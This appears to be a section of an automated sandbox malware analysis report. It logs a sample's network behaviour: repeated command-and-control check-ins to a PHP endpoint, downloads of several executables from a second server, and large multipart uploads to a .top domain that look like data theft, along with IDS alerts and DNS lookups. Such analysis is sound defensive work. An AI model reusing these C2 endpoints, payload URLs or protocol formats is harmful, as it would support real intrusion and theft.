                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: GET /files/527224533/ReK7Ewx.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 37 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141760101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: GET /files/6691015685/V0Bt74c.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 37 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141770101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /files/5526411762/yUI6F6C.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 37 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141780101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141790101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 38 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141800101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: GET /files/5526411762/CgmaT61.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 38 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141810101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /files/7098980627/mAtJWNv.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 31 38 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10141820101&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /files/6386900832/PfOHmro.exe HTTP/1.1Host: 176.113.115.7
                                    Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
                                    Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
                                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49796 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49807 -> 188.114.97.3:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49809 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49816 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49817 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49820 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49812 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49819 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49825 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49821 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49826 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49830 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 188.114.97.3:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 188.114.97.3:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49844 -> 176.113.115.7:80
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49846 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49839 -> 5.75.210.149:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 104.21.16.1:443
                                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.16.1:443
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=qriTljdfXXOq8FKCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19617Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=a2PpkNgZu1AxvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=51p6xEbx0qRIVN424j4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8otA9KxX8H07r3kYp8yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2393Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7rAQ1E29CZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19589Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4TJl1FAOHWyfTMlfhhUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8786Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=fJvTyLf3tbaiBZ1q424User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 547884Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=mbD45cRGFDN8FsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20419Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=aiBagi9E5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2344Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 95Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5xlGFa6uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549886Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7NMW5Z6lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19579Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=21NrE5itsdJ6eo6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8771Host: garagedrootz.top
                                    Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BwZNskmyMpUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20399Host: garagedrootz.top
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0049CE44
                                    Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /files/527224533/ReK7Ewx.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/6691015685/V0Bt74c.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/5526411762/yUI6F6C.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/5526411762/CgmaT61.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/7098980627/mAtJWNv.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficHTTP traffic detected: GET /files/6386900832/PfOHmro.exe HTTP/1.1Host: 176.113.115.7
                                    Source: global trafficDNS traffic detected: DNS query: FQOotUESSGVeVFGvdJzYolWH.FQOotUESSGVeVFGvdJzYolWH
                                    Source: global trafficDNS traffic detected: DNS query: arisechairedd.shop
                                    Source: global trafficDNS traffic detected: DNS query: begindecafer.world
                                    Source: global trafficDNS traffic detected: DNS query: garagedrootz.top
                                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                                    Source: unknownHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: garagedrootz.top
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php%z
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php4/FH
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php:
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpG.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpO/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpP.
